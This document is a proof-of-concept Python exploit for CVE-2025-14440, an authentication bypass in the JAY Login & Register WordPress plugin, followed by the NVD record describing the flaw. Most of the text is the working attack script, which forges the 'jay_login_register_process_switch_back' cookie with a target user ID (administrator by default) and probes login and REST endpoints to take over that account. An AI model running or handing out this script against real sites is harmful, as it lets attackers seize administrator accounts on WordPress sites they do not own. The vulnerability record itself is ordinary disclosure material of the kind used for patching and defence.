CVE-2025-14440

import requests import argparse def exploit_cve_2025_14440(target_url, target_user_id): """ CVE-2025-14440 PoC - JAY Login & Register Authentication Bypass This exploits an authentication bypass vulnerability in the JAY Login & Register plugin. The vulnerability allows attackers to log in as any user by manipulating the 'jay_login_register_process_switch_back' cookie with a target user ID. """ # Target WordPress site URL target = target_url.rstrip('/') # Prepare malicious cookie with target user ID cookies = { 'jay_login_register_process_switch_back': str(target_user_id) } # Prepare request to trigger the vulnerable function # The vulnerable endpoint is typically the login processing page endpoints = [ '/wp-login.php', '/wp-admin/', '/', '/wp-json/jay-login-register/v1/user-switch-back' ] print(f"[*] Targeting: {target}") print(f"[*] Target User ID: {target_user_id}") print(f"[*] Attempting authentication bypass...\n") for endpoint in endpoints: try: url = f"{target}{endpoint}" response = requests.get(url, cookies=cookies, timeout=10, allow_redirects=False) # Check for successful authentication indicators if response.status_code in [200, 302] or 'wordpress_logged_in' in str(response.cookies): print(f"[+] Potential success at: {url}") print(f"[+] Status Code: {response.status_code}") print(f"[+] Check cookies for 'wordpress_logged_in_' session cookie") else: print(f"[-] Endpoint {endpoint}: Status {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {endpoint}: {str(e)}") print("\n[*] Note: After successful exploitation, verify login by accessing wp-admin") print("[*] The attacker can now perform actions as the target user (e.g., administrator)") if __name__ == '__main__': parser = argparse.ArgumentParser(description='CVE-2025-14440 PoC') parser.add_argument('-u', '--url', required=True, help='Target WordPress URL') parser.add_argument('-i', '--user-id', type=int, default=1, help='Target user ID (default: 1, usually admin)') args = parser.parse_args() exploit_cve_2025_14440(args.url, args.user_id)

{"cve": {"id": "CVE-2025-14440", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:49.570", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The JAY Login & Register plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.4.01. This is due to incorrect authentication checking in the 'jay_login_register_process_switch_back' function with the 'jay_login_register_process_switch_back' cookie value. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-565"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/jay-login-register/tags/2.4.01/includes/jay-login-register-user-switching.php#L98", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3418754/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/928877a6-eeeb-4ed5-900b-9b1560e1bf87?source=cve", "source": "[email protected]"}]}}